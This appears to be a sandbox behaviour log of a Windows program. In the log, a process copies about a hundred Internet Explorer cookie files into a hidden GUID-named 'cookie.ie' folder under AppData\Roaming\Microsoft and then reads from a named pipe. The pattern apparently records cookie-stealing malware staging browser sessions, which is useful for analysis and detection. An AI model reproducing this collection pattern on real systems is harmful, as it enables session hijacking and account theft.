Copy C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\cookie.ie\Low\4MN240WN.txt source_filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Microsoft\Windows\INetCookies\Low\4MN240WN.txt True 1
Copy C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\cookie.ie\Low\4O6583I0.txt source_filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Microsoft\Windows\INetCookies\Low\4O6583I0.txt True 1
Copy C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\cookie.ie\Low\4YWCPPXN.txt source_filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Microsoft\Windows\INetCookies\Low\4YWCPPXN.txt True 1
Copy C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\cookie.ie\Low\4Z6UDYLY.txt source_filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Microsoft\Windows\INetCookies\Low\4Z6UDYLY.txt True 1
Copy C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\cookie.ie\Low\5AFMRGRY.txt source_filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Microsoft\Windows\INetCookies\Low\5AFMRGRY.txt True 1
Copy C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\cookie.ie\Low\5ARQYMIV.txt source_filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Microsoft\Windows\INetCookies\Low\5ARQYMIV.txt True 1
Copy C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\cookie.ie\Low\5AV8L20N.txt source_filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Microsoft\Windows\INetCookies\Low\5AV8L20N.txt True 1
Copy C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\cookie.ie\Low\5NWXN3UI.txt source_filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Microsoft\Windows\INetCookies\Low\5NWXN3UI.txt True 1
Copy C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\cookie.ie\Low\5STJ6NZL.txt source_filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Microsoft\Windows\INetCookies\Low\5STJ6NZL.txt True 1
Copy C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\cookie.ie\Low\5TAY54V0.txt source_filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Microsoft\Windows\INetCookies\Low\5TAY54V0.txt True 1
Copy C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\cookie.ie\Low\5WQEGNKI.txt source_filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Microsoft\Windows\INetCookies\Low\5WQEGNKI.txt True 1
Copy C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\cookie.ie\Low\66I0OJL8.txt source_filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Microsoft\Windows\INetCookies\Low\66I0OJL8.txt True 1
Copy C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\cookie.ie\Low\80J4IH0Y.txt source_filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Microsoft\Windows\INetCookies\Low\80J4IH0Y.txt True 1
Copy C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\cookie.ie\Low\8FFCGS26.txt source_filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Microsoft\Windows\INetCookies\Low\8FFCGS26.txt True 1
Copy C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\cookie.ie\Low\9ABR37NL.txt source_filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Microsoft\Windows\INetCookies\Low\9ABR37NL.txt True 1
Copy C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\cookie.ie\Low\9IJPMFHZ.txt source_filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Microsoft\Windows\INetCookies\Low\9IJPMFHZ.txt True 1
Copy C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\cookie.ie\Low\9M7ZHW1Q.txt source_filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Microsoft\Windows\INetCookies\Low\9M7ZHW1Q.txt True 1
Copy C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\cookie.ie\Low\9XACNSYG.txt source_filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Microsoft\Windows\INetCookies\Low\9XACNSYG.txt True 1
Copy C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\cookie.ie\Low\9Z1Y5ICI.txt source_filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Microsoft\Windows\INetCookies\Low\9Z1Y5ICI.txt True 1
Copy C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\cookie.ie\Low\A0RK8A2H.txt source_filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Microsoft\Windows\INetCookies\Low\A0RK8A2H.txt True 1
Copy C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\cookie.ie\Low\AA2IJ7JU.txt source_filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Microsoft\Windows\INetCookies\Low\AA2IJ7JU.txt True 1
Copy C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\cookie.ie\Low\B427TFXJ.txt source_filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Microsoft\Windows\INetCookies\Low\B427TFXJ.txt True 1
Copy C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\cookie.ie\Low\BK4HNAZ1.txt source_filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Microsoft\Windows\INetCookies\Low\BK4HNAZ1.txt True 1
Copy C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\cookie.ie\Low\CC7DS78R.txt source_filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Microsoft\Windows\INetCookies\Low\CC7DS78R.txt True 1
Copy C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\cookie.ie\Low\CDGOWO27.txt source_filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Microsoft\Windows\INetCookies\Low\CDGOWO27.txt True 1
Copy C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\cookie.ie\Low\CYHYO8JD.txt source_filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Microsoft\Windows\INetCookies\Low\CYHYO8JD.txt True 1
Copy C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\cookie.ie\Low\D9QO3KHK.txt source_filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Microsoft\Windows\INetCookies\Low\D9QO3KHK.txt True 1
Copy C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\cookie.ie\Low\DN8YUCVA.txt source_filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Microsoft\Windows\INetCookies\Low\DN8YUCVA.txt True 1
Copy C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\cookie.ie\Low\DQI7WAG8.txt source_filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Microsoft\Windows\INetCookies\Low\DQI7WAG8.txt True 1
Copy C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\cookie.ie\Low\DRDF2EZX.txt source_filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Microsoft\Windows\INetCookies\Low\DRDF2EZX.txt True 1
Copy C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\cookie.ie\Low\E2KPI4ZI.txt source_filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Microsoft\Windows\INetCookies\Low\E2KPI4ZI.txt True 1
Copy C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\cookie.ie\Low\E978TFRK.txt source_filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Microsoft\Windows\INetCookies\Low\E978TFRK.txt True 1
Copy C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\cookie.ie\Low\F68MFAMN.txt source_filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Microsoft\Windows\INetCookies\Low\F68MFAMN.txt True 1
Copy C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\cookie.ie\Low\FCGXHIFT.txt source_filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Microsoft\Windows\INetCookies\Low\FCGXHIFT.txt True 1
Copy C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\cookie.ie\Low\FGTTES1V.txt source_filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Microsoft\Windows\INetCookies\Low\FGTTES1V.txt True 1
Copy C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\cookie.ie\Low\FLTMVY1F.txt source_filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Microsoft\Windows\INetCookies\Low\FLTMVY1F.txt True 1
Copy C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\cookie.ie\Low\FOLSAQT6.txt source_filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Microsoft\Windows\INetCookies\Low\FOLSAQT6.txt True 1
Copy C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\cookie.ie\Low\GXB342YS.txt source_filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Microsoft\Windows\INetCookies\Low\GXB342YS.txt True 1
Copy C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\cookie.ie\Low\H5LCJX1B.txt source_filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Microsoft\Windows\INetCookies\Low\H5LCJX1B.txt True 1
Copy C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\cookie.ie\Low\HBPP9XXY.txt source_filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Microsoft\Windows\INetCookies\Low\HBPP9XXY.txt True 1
Copy C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\cookie.ie\Low\HF8F6LU0.txt source_filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Microsoft\Windows\INetCookies\Low\HF8F6LU0.txt True 1
Copy C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\cookie.ie\Low\HTVL5WIW.txt source_filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Microsoft\Windows\INetCookies\Low\HTVL5WIW.txt True 1
Copy C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\cookie.ie\Low\ILF13HLB.txt source_filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Microsoft\Windows\INetCookies\Low\ILF13HLB.txt True 1
Copy C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\cookie.ie\Low\ISTFXHHR.txt source_filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Microsoft\Windows\INetCookies\Low\ISTFXHHR.txt True 1
Copy C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\cookie.ie\Low\ITD4OUAR.txt source_filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Microsoft\Windows\INetCookies\Low\ITD4OUAR.txt True 1
Copy C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\cookie.ie\Low\J4JSQG9R.txt source_filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Microsoft\Windows\INetCookies\Low\J4JSQG9R.txt True 1
Copy C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\cookie.ie\Low\JQOCYKOH.txt source_filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Microsoft\Windows\INetCookies\Low\JQOCYKOH.txt True 1
Copy C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\cookie.ie\Low\JWFWLAYR.txt source_filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Microsoft\Windows\INetCookies\Low\JWFWLAYR.txt True 1
Copy C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\cookie.ie\Low\K8249Y1G.txt source_filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Microsoft\Windows\INetCookies\Low\K8249Y1G.txt True 1
Copy C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\cookie.ie\Low\KNJ4AJDH.txt source_filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Microsoft\Windows\INetCookies\Low\KNJ4AJDH.txt True 1
Copy C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\cookie.ie\Low\L78EW25D.txt source_filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Microsoft\Windows\INetCookies\Low\L78EW25D.txt True 1
Copy C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\cookie.ie\Low\LC10XEWL.txt source_filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Microsoft\Windows\INetCookies\Low\LC10XEWL.txt True 1
Copy C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\cookie.ie\Low\LVARU12Y.txt source_filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Microsoft\Windows\INetCookies\Low\LVARU12Y.txt True 1
Copy C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\cookie.ie\Low\LY1NFEKN.txt source_filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Microsoft\Windows\INetCookies\Low\LY1NFEKN.txt True 1
Copy C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\cookie.ie\Low\LY3FDU65.txt source_filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Microsoft\Windows\INetCookies\Low\LY3FDU65.txt True 1
Copy C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\cookie.ie\Low\M19117WZ.txt source_filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Microsoft\Windows\INetCookies\Low\M19117WZ.txt True 1
Copy C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\cookie.ie\Low\MA5WDFBR.txt source_filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Microsoft\Windows\INetCookies\Low\MA5WDFBR.txt True 1
Copy C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\cookie.ie\Low\MBJX4MYA.txt source_filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Microsoft\Windows\INetCookies\Low\MBJX4MYA.txt True 1
Copy C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\cookie.ie\Low\MCAKE788.txt source_filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Microsoft\Windows\INetCookies\Low\MCAKE788.txt True 1
Copy C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\cookie.ie\Low\MIL4MU1S.txt source_filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Microsoft\Windows\INetCookies\Low\MIL4MU1S.txt True 1
Copy C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\cookie.ie\Low\MM8KB9U2.txt source_filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Microsoft\Windows\INetCookies\Low\MM8KB9U2.txt True 1
Copy C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\cookie.ie\Low\MMPF10F4.txt source_filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Microsoft\Windows\INetCookies\Low\MMPF10F4.txt True 1
Copy C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\cookie.ie\Low\MOE7DCQU.txt source_filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Microsoft\Windows\INetCookies\Low\MOE7DCQU.txt True 1
Copy C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\cookie.ie\Low\NEHE4KDB.txt source_filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Microsoft\Windows\INetCookies\Low\NEHE4KDB.txt True 1
Copy C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\cookie.ie\Low\NOCAHPZ6.txt source_filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Microsoft\Windows\INetCookies\Low\NOCAHPZ6.txt True 1
Copy C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\cookie.ie\Low\NYCCG1AV.txt source_filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Microsoft\Windows\INetCookies\Low\NYCCG1AV.txt True 1
Copy C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\cookie.ie\Low\O8FFFI2K.txt source_filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Microsoft\Windows\INetCookies\Low\O8FFFI2K.txt True 1
Copy C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\cookie.ie\Low\P778SMC9.txt source_filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Microsoft\Windows\INetCookies\Low\P778SMC9.txt True 1
Copy C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\cookie.ie\Low\PF9HBAFQ.txt source_filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Microsoft\Windows\INetCookies\Low\PF9HBAFQ.txt True 1
Copy C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\cookie.ie\Low\PK3I34UV.txt source_filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Microsoft\Windows\INetCookies\Low\PK3I34UV.txt True 1
Copy C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\cookie.ie\Low\QUMCK8L4.txt source_filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Microsoft\Windows\INetCookies\Low\QUMCK8L4.txt True 1
Copy C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\cookie.ie\Low\RAYRHE6Z.txt source_filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Microsoft\Windows\INetCookies\Low\RAYRHE6Z.txt True 1
Copy C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\cookie.ie\Low\RQK5QF4L.txt source_filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Microsoft\Windows\INetCookies\Low\RQK5QF4L.txt True 1
Copy C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\cookie.ie\Low\RTEPN67M.txt source_filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Microsoft\Windows\INetCookies\Low\RTEPN67M.txt True 1
Copy C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\cookie.ie\Low\RYK7X1K4.txt source_filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Microsoft\Windows\INetCookies\Low\RYK7X1K4.txt True 1
Copy C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\cookie.ie\Low\S0EK69P5.txt source_filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Microsoft\Windows\INetCookies\Low\S0EK69P5.txt True 1
Copy C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\cookie.ie\Low\SEVCUJM3.txt source_filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Microsoft\Windows\INetCookies\Low\SEVCUJM3.txt True 1
Copy C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\cookie.ie\Low\STGOZ493.txt source_filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Microsoft\Windows\INetCookies\Low\STGOZ493.txt True 1
Copy C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\cookie.ie\Low\T1LCPPSA.txt source_filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Microsoft\Windows\INetCookies\Low\T1LCPPSA.txt True 1
Copy C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\cookie.ie\Low\TCXQPY9L.txt source_filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Microsoft\Windows\INetCookies\Low\TCXQPY9L.txt True 1
Copy C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\cookie.ie\Low\TEW946CI.txt source_filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Microsoft\Windows\INetCookies\Low\TEW946CI.txt True 1
Copy C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\cookie.ie\Low\TFCJHLEI.txt source_filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Microsoft\Windows\INetCookies\Low\TFCJHLEI.txt True 1
Copy C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\cookie.ie\Low\U2OYIS47.txt source_filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Microsoft\Windows\INetCookies\Low\U2OYIS47.txt True 1
Copy C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\cookie.ie\Low\U8FCPAKJ.txt source_filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Microsoft\Windows\INetCookies\Low\U8FCPAKJ.txt True 1
Copy C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\cookie.ie\Low\UBUPNOZC.txt source_filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Microsoft\Windows\INetCookies\Low\UBUPNOZC.txt True 1
Copy C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\cookie.ie\Low\UBXQG39X.txt source_filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Microsoft\Windows\INetCookies\Low\UBXQG39X.txt True 1
Copy C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\cookie.ie\Low\UGL14QS0.txt source_filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Microsoft\Windows\INetCookies\Low\UGL14QS0.txt True 1
Copy C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\cookie.ie\Low\UUEVXDWP.txt source_filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Microsoft\Windows\INetCookies\Low\UUEVXDWP.txt True 1
Copy C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\cookie.ie\Low\V7NNCJHO.txt source_filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Microsoft\Windows\INetCookies\Low\V7NNCJHO.txt True 1
Copy C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\cookie.ie\Low\VD3GM2DA.txt source_filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Microsoft\Windows\INetCookies\Low\VD3GM2DA.txt True 1
Copy C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\cookie.ie\Low\WPEXKTDV.txt source_filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Microsoft\Windows\INetCookies\Low\WPEXKTDV.txt True 1
Copy C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\cookie.ie\Low\WUT8M1Q8.txt source_filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Microsoft\Windows\INetCookies\Low\WUT8M1Q8.txt True 1
Copy C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\cookie.ie\Low\WX75TEOR.txt source_filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Microsoft\Windows\INetCookies\Low\WX75TEOR.txt True 1
Copy C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\cookie.ie\Low\XRS5D0N2.txt source_filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Microsoft\Windows\INetCookies\Low\XRS5D0N2.txt True 1
Copy C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\cookie.ie\Low\XUAUK5R0.txt source_filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Microsoft\Windows\INetCookies\Low\XUAUK5R0.txt True 1
Copy C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\cookie.ie\Low\Y1I415YS.txt source_filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Microsoft\Windows\INetCookies\Low\Y1I415YS.txt True 1
Copy C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\cookie.ie\Low\Y3XU5OKR.txt source_filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Microsoft\Windows\INetCookies\Low\Y3XU5OKR.txt True 1
Read - size = 12, size_out = 0 False 6
Read \\.\pipe\{072BB6F5-BAEC-D114-FC2B-8E95F08FA299} size = 12, size_out = 12 True 1
